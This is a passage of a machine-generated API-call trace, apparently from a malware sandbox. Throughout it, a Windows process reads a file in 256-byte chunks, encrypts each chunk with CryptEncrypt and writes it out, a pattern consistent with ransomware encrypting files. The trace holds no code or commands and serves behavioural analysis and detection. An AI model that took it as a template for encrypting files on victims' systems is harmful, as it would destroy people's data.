lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.618] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.618] GetLastError () returned 0x0 [0152.618] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.618] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.618] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.619] GetLastError () returned 0x0 [0152.619] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.619] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.619] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.619] GetLastError () returned 0x0 [0152.619] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.619] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.619] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.619] GetLastError () returned 0x0 [0152.619] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.619] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.619] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.619] GetLastError () returned 0x0 [0152.619] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.619] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.619] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.619] GetLastError () returned 0x0 [0152.619] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.619] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.619] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.619] GetLastError () returned 0x0 [0152.619] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.619] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.619] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.619] GetLastError () returned 0x0 [0152.620] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.620] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.620] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.620] GetLastError () returned 0x0 [0152.620] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.620] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.620] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.620] GetLastError () returned 0x0 [0152.620] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.620] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.620] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.620] GetLastError () returned 0x0 [0152.620] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.620] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.620] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.620] GetLastError () returned 0x0 [0152.620] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.620] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.620] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.620] GetLastError () returned 0x0 [0152.620] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.620] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.620] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.620] GetLastError () returned 0x0 [0152.620] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.621] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.621] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.621] GetLastError () returned 0x0 [0152.621] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.621] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.621] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.621] GetLastError () returned 0x0 [0152.621] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.621] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.621] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.621] GetLastError () returned 0x0 [0152.621] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.621] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.621] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.621] GetLastError () returned 0x0 [0152.621] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.621] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.621] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.621] GetLastError () returned 0x0 [0152.621] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.621] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.621] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.621] GetLastError () returned 0x0 [0152.621] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.622] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.622] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.622] GetLastError () returned 0x0 [0152.622] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.622] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.622] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.622] GetLastError () returned 0x0 [0152.622] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.622] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.622] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.622] GetLastError () returned 0x0 [0152.622] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.622] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.622] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.622] GetLastError () returned 0x0 [0152.622] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.622] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.622] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.622] GetLastError () returned 0x0 [0152.622] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.622] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.622] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.622] GetLastError () returned 0x0 [0152.622] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.622] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.623] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.623] GetLastError () returned 0x0 [0152.623] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.623] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.623] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.623] GetLastError () returned 0x0 [0152.623] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.623] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.623] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.623] GetLastError () returned 0x0 [0152.623] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.623] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.623] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.623] GetLastError () returned 0x0 [0152.623] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.623] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.623] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.623] GetLastError () returned 0x0 [0152.623] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.623] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.623] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.623] GetLastError () returned 0x0 [0152.623] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.623] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 